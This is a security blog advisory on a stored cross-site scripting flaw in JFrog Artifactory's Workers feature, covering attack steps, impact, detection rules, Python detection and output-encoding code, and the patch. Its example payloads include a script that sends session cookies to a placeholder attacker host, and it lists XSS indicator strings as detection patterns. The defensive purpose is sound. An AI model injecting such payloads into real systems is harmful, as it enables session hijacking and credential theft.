CVE-2025-14830: High-Risk XSS Flaw in Artifactory Workers Threatens CI/CD Pipeline Integrity

Product: JFrog Artifactory – Workers feature
Vulnerability Type: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting – XSS)
Affected Versions: >= 7.94.0 and < 7.117.10
Fixed Version: 7.117.10 and later

Risk Overview (at a glance)

  • CVE ID: CVE-2025-14830
  • CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation)
  • CVSS v3.x: Not officially published at the time of writing
  • Practical Severity: High
  • Exploitability: Medium
  • Exploit Availability: No public exploit kit observed; proof-of-concept style payloads are trivial
  • Attack Complexity: Low
  • Privileges Required: Low (authenticated user with access to Workers context)
  • User Interaction: Required (victim must view a crafted page or resource)
  • Impact: Session hijacking, credential theft, UI redirection, unauthorized actions in Artifactory UI

Detailed Description

CVE-2025-14830 is a stored Cross-Site Scripting (XSS) vulnerability in the Workers feature of JFrog Artifactory.
The issue arises when user-supplied input associated with Workers is stored and later rendered in the web UI without proper output encoding or sanitization.

Because the browser interprets this input as executable JavaScript rather than inert text, an attacker can inject scripts that execute in the context of another user’s authenticated session.

This vulnerability is particularly serious due to Artifactory’s role in CI/CD pipelines, release management, and production artifact distribution.


Affected Component – Workers

Artifactory Workers allow users to:

  • Automate repository tasks
  • React to events
  • Process metadata
  • Integrate custom logic into workflows

Certain Worker attributes (such as names, parameters, metadata values, or configuration fields) are:

  1. Accepted as input
  2. Stored by the application
  3. Later displayed in the Artifactory UI

The vulnerability occurs during step 3, where output encoding is missing or insufficient.


Attack Scenario (Step-by-Step)

  1. An attacker has authenticated access to Artifactory with permission to create or modify Workers.
  2. The attacker embeds malicious JavaScript into a Worker-related field.
  3. Artifactory stores this input without neutralizing it.
  4. A privileged user (often an administrator) views the Worker or related UI page.
  5. The injected script executes automatically in the victim’s browser.

This is a persistent attack and does not require repeated attacker interaction.


Impact Analysis

If successfully exploited, an attacker can:

  • Hijack authenticated user sessions
  • Steal cookies, tokens, or CSRF secrets
  • Perform unauthorized actions using the victim’s privileges
  • Modify repositories or permissions
  • Abuse CI/CD pipelines to introduce malicious artifacts
  • Redirect users to phishing pages
  • Establish long-term persistence through additional Workers

In environments where Artifactory is tightly integrated with production systems, the business and security impact can be severe.


Example Malicious Payloads

These payloads illustrate how exploitation typically occurs when output encoding is missing:

<script>fetch('https://attacker.example/log?c='+document.cookie)</script>
"><img src=x onerror="alert('XSS')">
<svg onload="document.location='https://attacker.example'">

If these payloads execute instead of rendering as plain text, the system is vulnerable.


MITRE ATT&CK Mapping

  • Initial Access
    • Exploitation of application functionality
  • Execution
    • JavaScript execution in a trusted browser context
  • Credential Access
    • Browser session and token theft
  • Privilege Escalation
    • Abuse of administrator sessions
  • Persistence
    • Malicious Worker configurations retained across sessions

Detection Guidance

Log Sources to Monitor

  • Artifactory application logs
  • Audit and access logs
  • Worker creation and modification logs
  • Reverse proxy or load balancer logs

Indicators of Compromise

  • HTML or JavaScript tags in Worker names or parameters
  • Suspicious strings such as:
    • <script
    • <svg
    • onerror=
    • onload=
    • javascript:
  • Unexpected outbound HTTP requests initiated from user browsers
  • Unexplained administrative actions following UI access

Detection Rule Examples

SIEM Logic

  • Alert when Worker-related input contains HTML tags or JavaScript keywords
  • Correlate with UI page views by higher-privileged users

WAF / Proxy Logic

  • Inspect POST and PUT requests related to Workers
  • Block or log payloads containing executable HTML or event handlers
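The SIEM and WAF logic above can be reduced to a small amount of code. The following Python is an added illustration, not part of the original advisory and not JFrog tooling: it applies the indicator strings listed above (after URL- and entity-decoding, so encoded variants are not missed) to constructed Worker create/update events, then correlates flagged Workers with later views by administrators. The JSON event layout, field names and rule names are assumptions, not Artifactory's real audit format.

```python
from __future__ import annotations

import html
import json
import re
import urllib.parse
from dataclasses import dataclass

# Indicator strings from the advisory as case-insensitive patterns, plus a
# generic "looks like an HTML tag" pattern. Rule names are hypothetical.
INDICATORS = {
    "script_tag": re.compile(r"<script", re.I),
    "svg_tag": re.compile(r"<svg", re.I),
    "onerror_handler": re.compile(r"onerror\s*=", re.I),
    "onload_handler": re.compile(r"onload\s*=", re.I),
    "javascript_uri": re.compile(r"javascript\s*:", re.I),
    # '<' (or '</') immediately followed by a tag name, then '>'
    "html_tag": re.compile(r"</?[a-z][a-z0-9-]*(\s[^>]*)?>", re.I),
}


def normalize(value: str) -> str:
    """Undo URL-encoding and HTML entities (twice, to cover double encoding)
    so that encoded variants of the indicators are still matched."""
    for _ in range(2):
        value = html.unescape(urllib.parse.unquote(value))
    return value


def find_indicators(value: str) -> list[str]:
    """Return the names of every indicator present in one Worker field value."""
    text = normalize(value)
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


@dataclass
class Alert:
    ts: str
    user: str
    worker: str
    field: str
    indicators: list[str]


def scan_worker_events(log_lines: list[str]) -> list[Alert]:
    """SIEM rule from the advisory: alert when a Worker create/update event
    carries HTML tags or JavaScript keywords in any free-text field.

    Assumed (constructed) log format: one JSON object per line with keys
    ts, user, role, action, worker and fields. This is not Artifactory's
    real audit format; adapt the field names to the actual log source.
    """
    alerts: list[Alert] = []
    for line in log_lines:
        event = json.loads(line)
        if event.get("action") not in ("worker.create", "worker.update"):
            continue
        for field, value in event.get("fields", {}).items():
            hits = find_indicators(str(value))
            if hits:
                alerts.append(Alert(event["ts"], event["user"], event["worker"], field, hits))
    return alerts


def correlate_admin_views(log_lines: list[str], alerts: list[Alert]) -> list[tuple[str, str, str]]:
    """Second stage from the advisory: a flagged Worker later viewed by a
    higher-privileged user is the case to escalate, because that is when a
    stored payload would execute. Returns (viewer, worker, ts) tuples."""
    flagged = {a.worker for a in alerts}
    hits = []
    for line in log_lines:
        event = json.loads(line)
        if (event.get("action") == "worker.view"
                and event.get("role") == "admin"
                and event.get("worker") in flagged):
            hits.append((event["user"], event["worker"], event["ts"]))
    return hits


# Constructed sample events (not real Artifactory log data).
SAMPLE_LOG = [
    '{"ts": "2025-01-10T09:00:01Z", "user": "dev1", "role": "developer", "action": "worker.create", "worker": "cleanup", "fields": {"name": "cleanup", "description": "removes old snapshots"}}',
    '{"ts": "2025-01-10T09:05:12Z", "user": "dev2", "role": "developer", "action": "worker.update", "worker": "notify", "fields": {"name": "notify", "description": "<script>alert(1)</script>"}}',
    '{"ts": "2025-01-10T09:06:40Z", "user": "dev2", "role": "developer", "action": "worker.update", "worker": "report", "fields": {"name": "%3Csvg%20onload%3D%22alert(1)%22%3E", "description": "weekly"}}',
    '{"ts": "2025-01-10T09:30:00Z", "user": "admin1", "role": "admin", "action": "worker.view", "worker": "notify"}',
    '{"ts": "2025-01-10T09:31:00Z", "user": "admin1", "role": "admin", "action": "worker.view", "worker": "cleanup"}',
]

if __name__ == "__main__":
    found = scan_worker_events(SAMPLE_LOG)
    for alert in found:
        print(f"ALERT {alert.ts} {alert.user} worker={alert.worker} field={alert.field} {alert.indicators}")
    for viewer, worker, ts in correlate_admin_views(SAMPLE_LOG, found):
        print(f"ESCALATE {ts} admin {viewer} viewed flagged worker {worker}")
```

On the sample data the rule flags the `description` of Worker `notify` and the URL-encoded `name` of Worker `report`, and the correlation stage escalates only `notify`, because that is the flagged Worker an administrator actually opened. The decoding step matters: without it the `report` entry would pass a naive substring check for `<svg`.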

Why This Vulnerability Is Important

Artifactory often holds:

  • Release artifacts
  • Proprietary binaries
  • CI/CD credentials
  • API keys and access tokens

A successful XSS attack can bridge the gap between user-level access and full DevOps compromise, making this issue far more dangerous than a typical UI vulnerability.


Patch and Remediation

Vendor Fix

JFrog has resolved this issue by:

  • Applying strict output encoding
  • Improving server-side input handling for Worker-related UI elements

Required Action

  • Upgrade to Artifactory version 7.117.10 or later

Official Patch Source

  • JFrog Artifactory official release and upgrade channels

Compensating Controls (If Immediate Upgrade Is Not Possible)

  • Restrict Worker access to trusted roles only
  • Apply strict Content Security Policy headers
  • Monitor Worker modifications in real time
  • Sanitize inputs at the reverse proxy level
  • Enforce session timeouts and least-privilege access
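The vendor fix is output encoding, and the compensating controls include a strict Content Security Policy. The following Python is an added illustration, not JFrog's code and not a description of Artifactory's actual templates: a constructed Worker record carrying the three payloads shown earlier is rendered once by plain concatenation (the defect class) and once with context-aware encoding, and a helper returns an example CSP. The HTML template, function names and policy values are assumptions.

```python
import html

# Constructed Worker record as a UI might receive it from the server.
# The field values are the advisory's own payloads; a real record would
# have whatever an authenticated user typed into the Worker fields.
WORKER = {
    "name": '"><img src=x onerror="alert(\'XSS\')">',
    "description": "<script>fetch('https://attacker.example/log?c='+document.cookie)</script>",
    "target": "<svg onload=\"document.location='https://attacker.example'\">",
}


def render_vulnerable(worker: dict) -> str:
    """The defect class described in the advisory: stored values are
    concatenated straight into HTML, so the browser parses them as markup."""
    return (
        f'<div class="worker" data-name="{worker["name"]}">'
        f'<h2>{worker["name"]}</h2>'
        f'<p>{worker["description"]}</p>'
        f'<a href="{worker["target"]}">target</a>'
        "</div>"
    )


def encode_text(value: str) -> str:
    """HTML body context: & < > become entities, so no tag can start."""
    return html.escape(value, quote=False)


def encode_attr(value: str) -> str:
    """Quoted-attribute context: also encode both quote characters, so the
    value cannot close the attribute and start an event handler."""
    return html.escape(value, quote=True)


def safe_href(value: str) -> str:
    """URL attribute context: allow only http(s) URLs, then attribute-encode.
    Anything else (javascript:, data:, raw markup) is replaced by an inert '#'."""
    lowered = value.strip().lower()
    if not (lowered.startswith("https://") or lowered.startswith("http://")):
        return "#"
    return encode_attr(value)


def render_hardened(worker: dict) -> str:
    """Same template, with each value encoded for the context it lands in."""
    return (
        f'<div class="worker" data-name="{encode_attr(worker["name"])}">'
        f'<h2>{encode_text(worker["name"])}</h2>'
        f'<p>{encode_text(worker["description"])}</p>'
        f'<a href="{safe_href(worker["target"])}">target</a>'
        "</div>"
    )


# Number of '<' the template itself emits, measured on an empty record.
TEMPLATE_TAG_COUNT = render_hardened({"name": "", "description": "", "target": ""}).count("<")


def extra_tag_openers(rendered: str) -> int:
    """'<' characters in the output beyond those the template emits. Any
    positive value means user-controlled markup reached the browser."""
    return rendered.count("<") - TEMPLATE_TAG_COUNT


def security_headers() -> dict:
    """Compensating control from the advisory: an example strict CSP (not
    JFrog's) that forbids inline script and event handlers and limits where the
    page may connect, so an unencoded payload can neither run nor exfiltrate."""
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'; "
            "base-uri 'none'; frame-ancestors 'none'; connect-src 'self'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    print("vulnerable extra tags:", extra_tag_openers(render_vulnerable(WORKER)))
    print("hardened extra tags:  ", extra_tag_openers(render_hardened(WORKER)))
    print(render_hardened(WORKER))
```

The encoding has to match the output context: `encode_text` is enough inside element bodies, but the `"><img` payload only works because it closes a quoted attribute, so attribute values need the quote characters encoded as well, and `href` needs a scheme allow-list on top of encoding. A policy without `'unsafe-inline'` blocks the inline `<script>` and `onerror=`/`onload=` handlers even if an encoding gap remains, but it also blocks any inline script the application's own UI relies on, so it must be tested against the real front end before enforcement.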

Final Takeaway

CVE-2025-14830 represents a high-impact stored XSS vulnerability in a critical DevOps platform.
While it does not directly enable server-side code execution, the indirect access gained through privileged sessions can lead to full pipeline compromise.

Immediate patching is strongly recommended.


Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.